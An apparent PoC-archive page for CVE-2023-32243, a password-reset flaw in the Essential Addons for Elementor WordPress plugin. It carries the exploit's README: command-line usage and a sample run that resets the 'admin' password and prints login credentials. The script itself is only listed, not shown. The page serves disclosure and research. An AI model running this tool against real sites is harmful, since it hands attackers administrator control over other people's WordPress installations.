Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2023-32243 PoC — WordPress plugin Essential Addons for Elementor 授权问题漏洞

Source
Associated Vulnerability
Title:WordPress plugin Essential Addons for Elementor 授权问题漏洞 (CVE-2023-32243)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Essential Addons for Elementor 5.4.0版本至5.7.1版本存在授权问题漏洞,该漏洞源于存在身份验证不当,攻击者利用该漏洞可以提升权限。
Description
CVE-2023-32243 - Essential Addons for Elementor 5.4.0-5.7.1 - Unauthenticated Privilege Escalation
Readme
# CVE-2023-32243.
Essential Addons for Elementor 5.4.0-5.7.1 - Unauthenticated Privilege Escalation

Info
---
The plugin does not validate the password reset key, which could allow unauthenticated attackers to reset arbitrary account's password to anything they want, by knowing the related email or username, gaining access to them

Python Setup
----

```
pip install -r requirements.txt
```


Exploit Details
----

https://patchstack.com/articles/critical-privilege-escalation-in-essential-addons-for-elementor-plugin-affecting-1-million-sites/

Usage
----

```
usage: exploit.py [-h] -u URL -p PASSWORD [-usr USERNAME]

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     URL of the WordPress site
  -p PASSWORD, --password PASSWORD
                        Password to set for the selected username
  -usr USERNAME, --username USERNAME
                        Username of the user to reset if you already know it.
 ```

Example
----

```
python3 exploit.py --url http://wordpress.lan  --password "adminadmin2"
Please select a username:
1. admin
> 1
Nonce value: f010bc2ac9
All Set! You can now login using the following credentials:
Username:  admin
Password:  adminadmin2
Admin Url: http://wordpress.lan/wp-admin/
```
File Snapshot

[4.0K] /data/pocs/c4a7aaeb14b3b316101f31856b88919b51e2a140 ├── [8.7K] exploit.py ├── [ 34K] LICENSE ├── [1.2K] README.md └── [ 18] requirements.txt 0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.